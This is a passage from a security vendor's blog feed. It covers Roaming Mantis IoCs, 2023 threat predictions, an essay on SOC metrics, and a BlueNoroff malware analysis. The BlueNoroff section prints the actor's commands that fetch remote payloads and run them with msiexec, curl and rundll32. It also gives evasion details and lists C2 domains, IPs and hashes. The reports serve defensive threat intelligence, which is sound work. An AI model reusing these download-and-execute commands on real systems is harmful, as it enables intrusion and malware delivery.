www.daum.net.           600     IN      A       121.53.105.193

;; Query time: 48 msec
;; SERVER: 193.239.154.15#53(193.239.154.15) (UDP)
;; WHEN: Wed Dec 07 02:09:57 GMT 2022
;; MSG SIZE  rcvd: 58

As you can see, their rogue DNS only works in the mobile domain, which is “m.xxx.zzz”. We believe the criminals only filtered a limited number of domains that can be resolved to their landing page to hide their activity from security researchers.

Geography based on KSN

Our telemetry showed the detection rate of Wroba.o (Trojan-Dropper.AndroidOS.Wroba.o) for each region such as France (54.4%), Japan (12.1%) and the United States (10.1%). When compared with the landing page statistics above, the results are similar in that many detections have been observed in France, Japan, Austria and Germany. On the other hand, while we had previously monitored landing pages for the United States, this time we haven’t seen those landing pages.

Conclusions

From 2019 to 2022, Kaspersky observed that the Roaming Mantis campaign mainly used smishing to deliver a malicious URL to their landing page. In September 2022, we analyzed the new Wroba.o Android malware and discovered a DNS changer function that was implemented to target specific Wi-Fi routers used mainly in South Korea. Users with infected Android devices that connect to free or public Wi-Fi networks may spread the malware to other devices on the network if the Wi-Fi network they are connected to is vulnerable. Kaspersky experts are concerned about the potential for the DNS changer to be used to target other regions and cause significant issues. Kaspersky products detect this Android malware as HEUR:Trojan-Dropper.AndroidOS.Wroba.o or HEUR:Trojan-Dropper.AndroidOS.Agent.eq, providing protection from this cyberthreat to Kaspersky’s customers and users.

IoCs

MD5 of Wroba.o
2036450427a6f4c39cd33712aa46d609
8efae5be6e52a07ee1c252b9a749d59f
95a9a26a95a4ae84161e7a4e9914998c
ab79c661dd17aa62e8acc77547f7bd93
d27b116b21280f5ccc0907717f2fd596
f9e43cc73f040438243183e1faf46581

Domains of landing pages:
1hy5.cwdqh[.]com
3.wubmh[.]com
3y.tmztp[.]com
53th.xgunq[.]com
5c2d.zgngu[.]com
5.hmrgt[.]com
8.ondqp[.]com
9v.tbeew[.]com
d.vbmtu[.]com
g.dguit[.]com
j.vbrui[.]com
k.uvqyo[.]com
kwdd.cehsg[.]com
mh.mgtnv[.]com
o.wgvpd[.]com
r48.bgxbm[.]com
t9o.qcupn[.]com
vj.nrgsd[.]com
w3.puvmw[.]com
xtc9.rvnbg[.]com
y.vpyhc[.]com

IPs of landing pages:
103.80.134[.]40
103.80.134[.]41
103.80.134[.]42
103.80.134[.]48
103.80.134[.]49
103.80.134[.]50
103.80.134[.]51
103.80.134[.]52
103.80.134[.]53
103.80.134[.]54
134.122.137[.]14
134.122.137[.]15
134.122.137[.]16
199.167.138[.]36
199.167.138[.]38
199.167.138[.]39
199.167.138[.]40
199.167.138[.]41
199.167.138[.]43
199.167.138[.]44
199.167.138[.]45
199.167.138[.]48
199.167.138[.]49
199.167.138[.]51
199.167.138[.]52
27.124.36[.]32
27.124.36[.]34
27.124.36[.]52
27.124.39[.]241
27.124.39[.]242
27.124.39[.]243
91.204.227[.]131
91.204.227[.]132
91.204.227[.]144
91.204.227[.]145
91.204.227[.]146

Rogue DNS:
193.239.154[.]15
193.239.154[.]16
193.239.154[.]17
193.239.154[.]18
193.239.154[.]22

Hardcoded malicious accounts of vk.com to obtain live rogue DNS servers:
id728588947

Providing live rogue DNS servers:
107.148.162[.]237:26333/sever.ini

Suspicious accounts/pages of some legitimate services for obtaining C2s
http://m.vk[.]com/id668999378?act=info
http://m.vk[.]com/id669000526?act=info
http://m.vk[.]com/id669000956?act=info
http://m.vk[.]com/id674309800?act=info
http://m.vk[.]com/id674310752?act=info
http://m.vk[.]com/id730148259?act=info
http://m.vk[.]com/id730149630?act=info
http://m.vk[.]com/id761343811?act=info
http://m.vk[.]com/id761345428?act=info
http://m.vk[.]com/id761346006?act=info
https://www.youtube[.]com/channel/UCP5sKzxDLR5yhO1IB4EqeEg/about
https://docs.google[.]com/document/d/1s0n64k12_r9MglT5m9lr63M5F3e-xRyaMeYP7rdOTrA/mobilebasic
https://docs.google[.]com/document/d/1IIB6hhf_BB1DaxzC1aNfLEG1K97LsPsN55AT5pFWYKo/mobilebasic

C&C
91.204.227[.]32
91.204.227[.]33
92.204.255[.]173
91.204.227[.]39
118.160.36[.]14
198.144.149[.]131

2023. január 18.

What threatens corporations in 2023: media blackmail, fake leaks and cloud attacks

Kaspersky detects an average of 400,000 malicious files every day. These add up to 144 million annually. The threat landscape is constantly updated through new malware and spyware, advanced phishing methods, and new social engineering techniques. The media routinely report incidents and leaks of data that end up publicly accessible on the dark web. Hacker attacks constantly hurt individuals, corporations, and entire countries, and not just financially. In certain cases, cyberattacks may threaten human lives, for example if they target critical infrastructure.

Last year, the cybersecurity of corporations and government agencies was more significant than ever before, and will become even more so in 2023. As part of the Kaspersky Security Bulletin, the DFI (Digital Footprint Intelligence) and DFIR (Digital Forensics and Incident Response) teams have come up with an overview of threats that will be relevant to the segment in question.

More personal data leaks; corporate email at risk

The trend for personal data leaks grew rapidly in 2022 and will continue into 2023. Last year saw, a number of high-profile cases, such as Medibank, Uber, and WhatsApp. The leaks affected various organizations and amounts of data. For example, last September, an attacker offered for sale a database containing 105 million records with information about Indonesian citizens. The compromised data included full name, place and date of birth, gender, as well as national identification number. The perpetrator valued the data, seemingly taken from the General Elections Commission of Indonesia, at US$5,000 and put it up for sale on the dark web.

A post on the dark web that offers Indonesian data for sale and was found with the help of Digital Footprint Intelligence

We often see people use work email addresses to register with third-party sites and services, which can be hacked and exposed to a data leak, putting the security of the company that owns the email at risk. The attack surface in its infrastructure increases with the number of potentially vulnerable objects. When sensitive data becomes publicly accessible, it may invoke the interest of cybercriminals and trigger discussions of potential attacks on the organization on dark web sites (forums, instant messaging channels, onion resources, etc.). In addition, the likelihood of the data being used for phishing and social engineering increases. 

Media blackmail: businesses to learn they were hacked from hackers’ public posts with a countdown to publication

Ransomware operators set up blogs where they post about new successful hacks of businesses and publish the data they stole. The number of posts in those blogs grew in 2022, both in open sources and on the dark web. Whereas we were seeing 200 to 300 posts in each of the first ten months of 2021, the number peaked at more than 500 monthly at the end of 2021 and the first half of 2022[1].

Changes in the number of ransomware blog posts in 2021–2022, worldwide

Extortionists used to try to settle matters with victim businesses in private, without attracting the attention of the broader public. Cybercriminals used to strive to keep a low profile until they got what they wanted, while the hack victims preferred to avoid reputational damage or any other consequences of the attack. These days, hackers post about the security breach in their blogs instead of contacting the victim, set a countdown timer to the publication of the leaked data, and wait for the victim’s reaction. This pattern helps cybercriminals win regardless of whether the victim pays up or not. Data is often auctioned, with the closing bid sometimes exceeding the demanded ransom.

Example: a post about the hack of the Australian company Medibank, found with the help of Digital Footprint Intelligence

We expect that in 2023, cybercriminals will try to reach out to victim businesses ever less often, while the number of blog posts and mentions of victims’ names in the news will increase.

Example of a countdown to the publication of leaked data as seen in the LockBit ransomware blog

Enjoying the fun part: cybercriminals to post fake hack reports more often

These days, hardly a day goes by without a new leak being reported. The number of fake reports grows along with that. We believe that in 2023, cybercriminals will more frequently allege, that they have hacked a company, as an ego trip and a rep boost. A leak report that appears in public sources can be used as a media manipulation tool and hurt the target business regardless of whether the hack happened or not. It is key to identify these messages in a timely manner and initiate a response process similar to that for information security incidents. This includes monitoring of dark and deep web sites for leak or compromise reports.

Cloud technology and compromised data sourced on the dark web to become popular attack vectors

The major attack vectors, such as vulnerabilities in publicly used applications, compromised credentials, and emailed malicious links and attachments, will be joined by activities and tools relating to cloud and virtualization technology. Businesses increasingly transfer their information infrastructures to the cloud, often using partner services for that. They place little focus on information security when migrating to the cloud: this is not even a task they assign to the virtualization service provider. An incident catches the company with insufficient data for investigation, as the cloud provider neither gathers nor logs system events. This essentially makes investigating the incident a difficult task.

Cybercriminals will tap dark web sites more often in 2023 to purchase access to previously compromised organizations. Our investigations have revealed a clear trend: the number of attacks utilizing pre-compromised accounts posted on dark web sites is on the rise. What is dangerous about that trend is that the preliminary phase of the attack, that is the account being compromised, can go unnoticed. The victim company will not learn about the attack until it is faced with major damage, such as their services suffering interruptions or ransomware encrypting their data.

Digitalization brings increased cybersecurity risks with it. If a corporation is to secure the loyalty of its customers and partners, it must ensure business continuity and robust protection of its critical assets, corporate data and the entire IT infrastructure to counter growing threats. Large businesses and government organizations often employ multilevel security, but even that is not a guarantee against compromise. Therefore, timely, adequate incident response and investigation are essential to both remedying the consequences and fixing the root cause, as well as to preventing similar incidents from happening again.

Malware-as-a-service: a greater number of cookie-cutter attacks, more complex tools

The malware-as-a-service model will continue to gain popularity in 2023, with blackmailer teams among others. Cybercriminals try to optimize their work efforts by scaling their operations and outsourcing certain activities just as a legitimate business would. For instance, LockBit — you can read about its evolution here — has been expanding its services like a software development company. The cybercriminals recently went so far as to announce a bug bounty program. Malware-as-a-service (MaaS) is lowering the entry threshold for wannabe cybercriminals: anyone can launch a ransomware attack by renting a fitting malware tool.

Meanwhile, the number of popular and well-known ransomware tools will decline, and attacks will grow in similarity. Companies might view this as a positive: a great number of ransomware tools will utilize similar MaaS techniques and tactics, so a smaller number of these will need to be considered for SOC response. That said, attackers’ tools will grow in complexity, rendering automated systems insufficient as a means of complete security.

The year 2023 will be a complicated one from an information security perspective, because the threat landscape is evolving rapidly. This sets a pace for businesses, which are forced to adapt. On the brighter side, researchers have the advanced tools to curb the growing threats.

These were our predictions for the year 2023. A year from now, we shall see which ones materialized and which ones did not.

[1] The statistics contain data on sites that are covered by the Digital Footprint Intelligence monitoring system

2023. január 9.

How much security is enough?

According to a prominent Soviet science fiction writer, beauty is a fine line, a razor’s edge between two opposites locked in a never-ending battle. Today, we would put it less poetically as an ideal compromise between contradictions. An elegant, or beautiful, design is one that allows reaching that compromise.

As an information security professional, I like elegant designs — all the more so because trade-off is a prerequisite for an information security manager’s success: in particular, trade-off between the level of security and its cost in the most practical, literal sense. A common perception in the infosec community is that there can never be too much security, but it is understood that “too much” security is expensive — and sometimes, prohibitively so — from a business perspective. So, where is that fine line that defines “just enough” security, how much is enough, and how does one prove this to decision-makers? This is what I want to talk about.

Mathematics and images

There is a certain language barrier between a chief information security officer (CISO) and the above-mentioned decision-makers — I will refer to them as “business” for brevity. While security professionals speak of “lateral movement” and “attack surface”, business views infosec and the IT department as a whole as costs to be minimized. While the costs of IT are visible as hardware and software, it is hard to do the same with IS, as this is a purely applied function deeply integrated with IT and hardly perceivable at a high level of abstraction. I like to describe IS as one of IT’s many properties, a criterion by which to measure the quality of a company’s information systems. Quality is commonly understood to come at a price. Theoretically, business understands that too, but it asks valid questions: why it should allocate the exact amount articulated by the CISO, and what the company would get for that money.

IS funding requests historically have been backed by all kinds of horror stories: business will hear tales of current security incidents, such as ransomware attacks or data leaks, and then they will be told that a certain solution can help against the aforementioned threats. These arguments are supported by stories from relevant — and occasionally, not so much — publications containing a description and rough estimate of the damage along with the provider’s pricing. This is only good for a start, and there is no guarantee that the approach will work again, whereas we are interested in a continuously improving operational process that will help to measure the threat landscape with a reasonable degree of objectivity and in a way that is understandable to business, and adapt the corporate system of security controls to that. Therefore, let us put the horror stories aside as an approach that seriously lacks in both efficiency and effectiveness, and arm ourselves with relevant parameters.

I will start by highlighting the fact that humans are not particularly good at understanding plain text. Tables work much better, and images, better yet. Therefore, I recommend that your conversation with business about the need to improve the IS management system be illustrated with colorful diagrams and images that reflect the current threat landscape and the capabilities of operational security. The way to succeed is to make sure that the slide deck shows the capabilities of operational security — or simply, the SOC — as being up to current threats.

To compare the threat landscape with SOC performance, the data must be expressed in the same units. The efficiency and effectiveness of the SOC or any other team — let alone one that has any sort of service level agreement (SLA) — are constantly measured, so it is only logical to reuse the SOC metrics for evaluating the sufficiency of security. Measuring the threat landscape is a little less straightforward. Threats should be evaluated by a large number of parameters: the more characteristics of potential attackers we evaluate, the better the chance to obtain an unbiased picture. I would like to delve into two most obvious parameters, which are fairly easy to compute but also easy to explain without resorting to complex technical terms.

Mean time to detect an attack

Unfortunately, a complex attack is often noticed only when assessing impact, but our statistics include a fair number of mature companies that detected an attack at an earlier stage, which is favorable for our evaluation. Our analytics show that the mean detection time differs by attack scenario, but the planning of security controls should use the shortest time measured in hours.

As a consequence, the SOC is required to detect and localize the attack in time, which is normally expressed with two indicators: mean time to detect (MTTD) and mean time to respond (MTTR). Both must be less than the attacker’s mean time to reach the target, regardless of the attack type.

Time to investigate

This is the second, equally important, attribute, which is obviously related to the duration of the attackers’ presence in the compromised infrastructure.

The SOC team must have access to this value and the resources to respond without affecting the quality of monitoring.

I believe that indicators that demonstrate our SOC’s (in)ability to detect the threat before it goes far enough to cause damage are much easier for business to understand. Combined with many other indicators, such as “our SOC’s ability to detect specific attacker techniques and tools” or “our SOC’s ability to monitor specific penetration vectors”, these help to form the most unbiased assessment of the SOC’s operational preparedness and provide better arguments for business in favor of investing in a security area.

Using sources

Once we have settled on indicators to demonstrate to business, the question arises of where to get data from. Members of operational security teams who have accumulated their own incident detection and investigation statistics will immediately respond that a review of past cases should serve as the source of indicators for assessment. The outcome of the investigation will show the attackers’ time expectations and their methods, while the SOC metrics will provide an unbiased assessment of the defenders’ efficiency and effectiveness. Both types of indicators will be directly linked to the company, rather than being abstract assessments.

As for those who have not yet accumulated statistics and experience of their own, I recommend you using analytics from vendors and MSSPs. For instance, every year, we publish the DFIR team’s incident analytics, which can be used as a source of a potential attacker profile, while the SOC team’s analytical report will help to shape potential SOC targets. It goes without saying that the provider’s statistics should be representative for the industry and country the customer operates in rather than contain all sorts of irrelevant data. External sources of data could benefit experienced employees who draw upon their own data, too. These may serve as a source of information about new threats, which are already relevant to the industry as a whole but have not yet caught the eye of the specific organization’s SOC employees. In addition to that, external data will provide a basis for comparing the company’s own performance with that of the service providers to reevaluate the company’s ability to perform the work with in-house resources against the need for outsourcing.

Answering the question

The real cost of requisite security is the difference between attackers’ capabilities and the SOC team’s resources — provided that the former are assessed in terms of actual incidents and relevant statistics, and the latter, in terms of SOC metrics. The aforementioned MTTD and MTTR will work best, as they are easier for business to grasp than the SOC maturity model or other academic arguments. In my opinion, it is the combination of operational metrics based on both the company’s own teams’ past work and analytical reports by IS service providers that can help to achieve the right balance, resulting in the desired level of performance and efficiency at an acceptable cost in the long run, or in a word, in beauty.

2022. december 27.

BlueNoroff introduces new methods bypassing MoTW

BlueNoroff group is a financially motivated threat actor eager to profit from its cyberattack capabilities. We have published technical details of how this notorious group steals cryptocurrency before. We continue to track the group’s activities and this October we observed the adoption of new malware strains in its arsenal. The group usually takes advantage of Word documents and uses shortcut files for the initial intrusion. However, it has recently started to adopt new methods of malware delivery.

The first new method the group adopted is aimed at evading the Mark-of-the-Web (MOTW) flag, the security measure whereby Windows displays a warning message when the user tries to open a file downloaded from the internet. To do this, optical disk image (.iso extension) and virtual hard disk (.vhd extension) file formats were used. This is a common tactic used nowadays to evade MOTW, and BlueNoroff has also adopted it.

In addition, the group tested different file types to refine malware delivery methods. We observed a new Visual Basic Script, a previously unseen Windows Batch file, and a Windows executable. It seems the actors behind BlueNoroff are expanding or experimenting with new file types to convey their malware efficiently.

After researching the infrastructure that was utilized, we discovered more than 70 domains used by this group, meaning they were very active until recently. Also, they created numerous fake domains that look like venture capital and bank domains. Most of the domains imitate Japanese venture capital companies, indicating that the group has an extensive interest in Japanese financial entities.

Executive summary
  • BlueNoroff group introduced new file types to evade Mark-of-the-Web (MOTW) security measures;
  • BleuNoroff group expanded file types and tweaked infection methods;
  • BlueNoroff created numerous fake domains impersonating venture capital companies and banks.
Background

At the end of September 2022, we observed new BlueNoroff malware in our telemetry. After a careful investigation, we confirmed that the actor had adopted new techniques to convey the final payload. The actor took advantage of several scripts, including Visual Basic Script and Windows Batch script. They also started using disk image file formats, .iso and .vhd, to deliver their malware. For intermediate infection, the actor introduced a downloader to fetch and spawn the next stage payload. Although the initial intrusion methods were very different in this campaign, the final payload that we had analyzed previously was used without significant changes.

Novel infection chain

Long-lasting initial infection

Based on our telemetry, we observed that one victim in the UAE was attacked using a malicious Word document. The victim received a document file named “Shamjit Client Details Form.doc” on September 2, 2022. Unfortunately, we couldn’t acquire the document, but it was executed from the following path:
C:\Users\[username]\Desktop\SALES OPS [redacted]\[redacted]\Signed Forms & Income Docs\Shamjit Client Details Form.doc

Judging from the file path, we can assume that the victim was an employee in the sales department responsible for signing contracts.

Upon launch, the malicious document connects to the remote server and downloads the payload. In this particular case, the executable ieinstal.exe was used to bypass UAC.

  • Remote URL: https://bankofamerica.us[.]org/lsizTZCslJm/W+Ltv_Pa/qUi+KSaD/_rzNkkGuW6/cQHgsE=
  • Created payload path: %Profile%\cr.dat
  • Spawned command: cmd.exe %Profile%\cr.dat 5pKwgIV5otiKb6JrNddaVJOaLjMkj4zED238vIU=

After initial infection, we observed several keyboard hands-on activities by the operator. Through the implanted backdoor, they attempted to fingerprint the victim and install additional malware with high privileges. Upon infection, the operator executed several Windows commands to gather basic system information. They then returned 18 hours later to install further malware with high privileges.

Post-exploitation

Based on our telemetry, when the malicious Word document opens it fetches the next payload from the remote server:

  • Download URL: http://avid.lno-prima[.]lol/VcIf1hLJopY/shU_pJgW2Y/KvSuUJYGoa/sX+Xk4Go/gGhI=

The fetched payload is supposed to be saved in %Profile%\update.dll. Eventually, the fetched file is spawned with the following commands:

  • Command #1: rundll32.exe %Profile%\update.dll,#1 5pOygIlrsNaAYqx8JNZSTouZNjo+j5XEFHzxqIIqpQ==
  • Command #2: rundll32.exe %Profile%\update.dll,#1 5oGygYVhos+IaqBlNdFaVJSfMiwhh4LCDn4=

One of the other methods the BlueNoroff group usually uses is a ZIP archive with a shortcut file. The archive file we recently discovered contained a password-protected decoy document and a shortcut file named “Password.txt.lnk“. This is a classic BlueNoroff strategy to persuade the victim to execute the malicious shortcut file to acquire the decoy document’s password. The latest archive file (MD5 1e3df8ee796fc8a13731c6de1aed0818) discovered has a Japanese file name, 新しいボーナススケジュール.zip (Japanese for “New bonus schedule”), indicating they were interested in Japanese targets.

The main difference from the previous shortcut sample was that it fetched an additional script payload (Visual Basic Script or HTML Application); also, a different method of fetching and executing the next stage payload was adopted at this time. The command below was executed when the victim double-clicked on the shortcut file:

cmd.exe /c DeviceCredentialDeployment & echo jbusguid> %APPDATA%\Pass.txt & start %APPDATA%\Pass.txt && FOR %i IN (%systemroot%\system32\msiexec.*) DO msiexec -c /Q /i hxxps://www.capmarketreport[.]com/packageupd.msi?ccop=RoPbnVqYd & timeout

To evade detection, the actor utilized Living Off the Land Binaries (LOLBins). The DeviceCredentialDeployment execution is a well-known LOLBin used to hide the command’s windows. The actor also abused the msiexe.exe file to silently launch the fetched Windows Installer file.

Updated method #1: Tricks to evade MOTW flag

We observed that the actor examined different file types to deliver their malware. Recently, many threat actors have adopted image files to avoid MOTW (Mark-of-the-Web). In a nutshell, MOTW is a mitigation technique introduced by Microsoft. The NTFS file system marks a file downloaded from the internet, and Windows handles the file in a safe way. For example, when a Microsoft Office file is fetched from the internet, the OS opens it in Protected View, which restricts the execution of the embedded macro. In order to avoid this mitigation technique, more threat actors have started abusing ISO file types. The BlueNoroff group likely experimented with ISO image files to deliver their malware. Although it’s still under development, we mention this sample as an early warning. This ISO image file contains one PowerPoint slide show and one Visual Basic Script.

Embedded files of ISO image

The Microsoft PowerPoint file contains a link. When the user clicks the link, it executes the 1.vbs file through the WScript process. When we checked the VBS file, it only generated an “ok” message, which suggests BlueNoroff is still experimenting with this method.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="wscript%201.vbs" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/></Relationships>

Based on our other findings, we discovered an in-the-wild sample (MD5 a17e9fc78706431ffc8b3085380fe29f) from VirusTotal. At the time of analysis, this .vhd sample wasn’t detected by any antivirus. The virtual disk file contains a decoy PDF file, Windows executable file, and an encrypted Dump.bin file. The PDF and executable files have numerous spaces before the file extension to hide it and allay suspicions.

Files inside VHD a file

The Job_Description[spaces].exe file (MD5 931d0969654af3f77fc1dab9e2bd66b1) is a loader that loads the next stage payload. Upon launch, it copies the ​Dump.bin file to the ​%Templates%\war[current time][random value].bin (i.e., war166812964324445.bin). The Dump.bin has a modified PE header. The malware reads the first byte of Dump.bin, 0xAF in this file, and decodes 0x3E8 bytes with that key. The decrypted data is the header of a PE file, overwriting the recovered header to the original file. Eventually, it loads the decrypted DLL file by spawning the ordinary first export function.

The spawned downloader contains an encrypted configuration at the end of the file. The malware first acquires the total size of the configuration data and the length of the payload URL from the end of the file. They are located four bytes and eight bytes from the end of the file, respectively. The malware decrypts the configuration data with the RC4 algorithm using an embedded 64-byte key.

  • RC4 key: 46 61 44 6D 38 43 74 42 48 37 57 36 36 30 77 6C 62 74 70 79 57 67 34 6A 79 4C 46 62 67 52 33 49 76 52 77 36 45 64 46 38 49 47 36 36 37 64 30 54 45 69 6D 7A 54 69 5A 36 61 42 74 65 69 67 50 33
  • Restored URL: hxxps://docs.azure-protection[.]cloud/EMPxSKTgrr3/2CKnoSNLFF/0d6rQrBEMv/gGFroIw5_m/n9hLXkEOy3/wyQ%3D%3D

Structure of configuration

In the case of another downloader, however, the payload URL was delivered using a command line parameter. Also, some of the other downloaders (MD5 f766f97eb213d81bf15c02d4681c50a4) have functionality that checks the working environment. If the size of physical memory is less than 2,147,483,648 bytes, the malware terminates execution.

Infection flow of downloader

This downloader checks for the names of the following antivirus vendors: Sophos, Kaspersky, Avast, Avira, Bitdefender, TrendMicro, and Windows Defender. If TrendMicro, BitDefender, or Windows Defender products are installed, the malware conducts a classic unhooking DLL trick intended to remove user-mode hooks from the system library. This evasion technique overwrites the .text section of the pre-loaded ntdll library with the freshly loaded one so that the hooked API addresses are recovered with the original API address. With this trick, the malware can disable the functionalities of EDR/AV products. Next, the malware creates a mutex to avoid duplicate execution.

  • Mutex name: da9f0e7dc6c52044fa29bea5337b4792b8b873373ba99ad816d5c9f5f275f03f

Next, the malware opens a PDF decoy document in the same directory. The decoy document masquerades as a job offer from a Japanese multinational bank.

If Windows Defender or Bitdefender Antivirus is installed on the victim’s computer, the malware executes itself with the following commands:

  • Windows Defender: cmd /c timeout /t 10 & Del /f /q \”[current file name]\” & attrib -s -h \”[PDF decoy file]\” & rundll32 \”[current DLL file path]\” #1
  • Bitdefender: cmd /c timeout /t 10 & rundll32 \”[current DLL file path]\” #1

The primary objective of this malware is to fetch the next stage payload. To do this, the malware uses the cURL library, combining cURL commands depending on the antivirus installed.

  • Avira or Avast installed: curl -A cur1-agent -L [payload URL(| -x proxy URL)] -s -d da
  • Other cases: curl -A cur1-agent -L [payload URL(| -x proxy URL)] -s -d dl

Note that the user-agent name is “cur1-agent“, and the malware sends “da” POST data if the victim installed Avira or Avast; otherwise, the malware sends “dl” POST data. If the fetched data by cURL command contains “<html>” and “curl:”, the malware decrypts the payload with a delivered 64-byte RC4 key.

If Avira or Avast are installed, the malware saves the decrypted payload to “%TEMPLATES%\marcoor.dll” and spawns it with the rundll32.exe command with the payload URL.

  • command: exe %TEMPLATES%\marcoor.dll #1 [payload URL]

Otherwise, the malware doesn’t write the payload to the file and injects the fetched payload into the explorer.exe process. The fetched payload is a DLL type executable and its export function is spawned with the “payload URL”.

Unfortunately, we haven’t been able to obtain a precise infection chain so far. From our telemetry, however, we can confirm the victim was eventually compromised by backdoor-type malware. Based on the malware’s static information, and parts of the internal code, we assess that the final payload is still very similar to the Persistence Backdoor #2[1] we described in our previous blog.

Updated method #2: Scripts and novel downloader

Additionally, we observed the download and launch of a suspicious batch file. The actor exploited different LOLBins. The malware execution is done using a legitimate script, SyncAppvPublishingServer.vbs, in the system folder. This script is for executing the PowerShell script via a Windows scheduled task.

WScript.exe "%system32%\SyncAppvPublishingServer.vbs" "n;cmd.exe '/c curl perseus.bond/Dgy_0dU08lC/hCHEdlDFGV/P89bXhClww/uiOHK5H35B/bM%3D -A cur1-agent -o %public%\regsile.bat & start /b %public%\regsile.bat'

We also observed the context around that batch file in our telemetry. The batch file name is “What is Blockchain.bat“. As the file name suggests, this group still targets the blockchain industry. We acquired the scriptlet of the batch file.

xcopy /h /y /q How-To-Extension.pdf c:\users\public\Inproc.exe* start xcopy /h /y /q Blockchain-old.pdf c:\users\public\rwinsta.exe* start c:\users\public\Inproc.exe "%cd%\Blockchain.pdf"

The Inproc.exe is a legitimate mshta.exe file (MD5 0b4340ed812dc82ce636c00fa5c9bef2), and the rwinsta.exe is a legitimate rundll32.exe file (MD5 ef3179d498793bf4234f708d3be28633). The Blockchain.pdf file is a malicious HTML application file spawned by the mshta.exe process. Unfortunately, we don’t have the HTA script (Blockchain.pdf), but we can assume the functionality of the script based on our telemetry – showing the decoy document and fetching the next stage payload.

# Create a decoy password file and open it. cmd.exe" /c echo {PASSWORD}>%documents%\Userlink & notepad.exe %documents%\Userlink # Fetch the payload with cURL command and execute. cmd.exe" /c timeout 10 & curl perseus.bond/VcIf1hLJopY/shU_pJgW2Y/NX4SoGYuka/iiOHK5H35B/bM%3D -s -d md -A cur1-agent -o %documents%\macroor.dll& %documents%\macroor.dll #1 perseus.bond/VcIf1hLJopY/shU_pJgW2Y/NX4SoGYuka/iiOHK5H35B/bM%3D

Also, we observed this group introduce a new Windows executable-type downloader at this time. This malware (MD5 087407551649376d90d1743bac75aac8) spawns a fake password file while fetching a remote payload and executing it. Upon execution, it creates a fake file (wae.txt) to show a password composed of the string ‘password’ and fetches a payload from the embedded URL and loads it. This scheme, showing a password via notepad.exe, is a trick favored by the BlueNoroff group to avoid arousing the victim’s suspicion. Usually, the password contains the password needed to open the supplied encrypted decoy document.

Simple downloader with fake password file

It’s possible that the actor delivered the above Windows executable file in archive file format or disk image file format with an encrypted decoy document.

Infrastructure

While carrying out this research we found several C2 servers used by the actor. All the servers are hosted by VPS vendors as usual and several of them were resolved to the same IP address. The domain registration could be traced back to earlier in 2021, so this is an ongoing operation by the adversary.

Domain IP ISP ASN offerings.cloud
docs.azure-protection.cloud
bankofamerica.us.org 104.168.174.80 Hostwinds LLC. AS54290 perseus.bond
avid.lno-prima.lol 104.168.249.50 Hostwinds LLC. AS54290 offerings.cloud
perseus.bond
docs.azure-protection.cloud
avid.lno-prima.lol 152.89.247.87 combahton GmbH AS30823 offerings.cloud 172.86.121.130 HIVELOCITY AS29802 www.capmarketreport.com 149.28.247.34 The Constant Company, LLC AS20473 ms.msteam.biz
www.onlinecloud.cloud 155.138.159.45 The Constant Company, LLC AS20473

The actor usually used fake domains such as cloud hosting services for hosting malicious documents or payloads. They also created fake domains disguised as legitimate companies in the financial industry and investment companies. The domains, including pivoted domains, imitate venture capital names or big bank names. Most of the companies are Japanese companies, indicating the actor has a keen interest in Japanese markets.

Malicious domains Genuine company Category of business Country beyondnextventures.co
cloud.beyondnextventures.co Beyond Next Ventures
(https://beyondnextventures.com) Venture capital firm Japan smbc.ltd
smbcgroup.us
smbc-vc.com Sumitomo Mitsui Banking Corporation
(https://www.smbc.co.jp) Japanese multinational banking and financial services Japan cloud.mufg.tokyo
mufg.tokyo Mitsubishi UFJ Financial Group
(https://www.mufg.jp) Bank in Japan Japan vote.anobaka.info ANOBAKA
(https://anobaka.jp) Venture capital firm Japan it.zvc.capital Z Venture Capital
(https://zvc.vc) Venture capital firm Japan abf-cap.co ABF Capital
(https://www.abf-cap.com) Venture capital firm Japan angelbridge.capital Angel Bridge
(https://www.angelbridge.jp) Venture capital firm Japan mizuhogroup.us
careers.mizuhogroup.us Mizuho Financial Group
(https://www.mizuhogroup.com) Banking holding company Japan bankofamerica.tel
bankofamerica.nyc
bankofamerica.us.org Bank of America
(https://www.bankofamerica.com) Bank and financial services holding company USA tptf.us
tptf.ltd ​​Trans-Pacific Technology Fund
(https://tptf.co) Venture capital firm Taiwan Victims

As we described in the section ‘Long-lasting initial infection’, we discovered that one victim in the UAE, probably a home financing company, was compromised by classic BlueNoroff group malware. This financially motivated threat actor has been attacking various cryptocurrency-related businesses lately, but also other financial companies, as in this case.

In addition, based on the domain naming and decoy documents, we assume, with low confidence, that the entities in Japan are on the radar of this group. In one PowerPoint sample, we observed that the actor took advantage of a Japanese venture capital company. Also, the samples we mentioned in the ‘Long-lasting initial infection’ section above were delivered to the victim with a Japanese file name, suggesting the target can read Japanese.

Decoy document

Conclusion

According to a recent report, the BlueNoroff group stole cryptocurrency worth millions using their cyberattack capabilities. It shows that this group has a strong financial motivation and actually succeeds in making profits from their cyberattacks. As we can see from our latest finding, this notorious actor has introduced slight modifications to deliver their malware. This also suggests that attacks by this group are unlikely to decrease in the near future.

Indicators of compromise

Downloader
087407551649376d90d1743bac75aac8    regsile.exe

Cur1Agent downloader
f766f97eb213d81bf15c02d4681c50a4
61a227bf4c5c1514f5cbd2f37d98ef5b
4c0fb06320d1b7ecf44ffd0442fc10ed
d8f6290517c114e73e03ab30165098f6

Loader
d3503e87df528ce3b07ca6d94d1ba9fc    E:\Readme.exe
931d0969654af3f77fc1dab9e2bd66b1    Job_Description.       exe

Malicious Virtual Disk File
a17e9fc78706431ffc8b3085380fe29f    Job_Description.vhd

Zip file and unzipped malicious shortcut
1e3df8ee796fc8a13731c6de1aed0818    新しいボーナススケジュール.zip (New bonus schedule)
21e9ddd5753363c9a1f36240f989d3a9    Password.txt.lnk

URLs
hxxp://avid.lno-prima[.]lol/VcIf1hLJopY/shU_pJgW2Y/KvSuUJYGoa/sX+Xk4Go/gGhI=
hxxp://avid.lno-prima[.]lol/NafqhbXR7KC/rTVCtCpxPH/kMjTqFDDNt/fiOHK5H35B/bM%3D
hxxp://offerings[.]cloud/NafqhbXR7KC/rTVCtCpxPH/pdQTpFN6FC/Lhr_wXGXix/nQ%3D
hxxps://docs.azure-protection[.]cloud/EMPxSKTgrr3/2CKnoSNLFF/0d6rQrBEMv/gGFroIw5_m/n9hLXkEOy3/wyQ%3D%3D
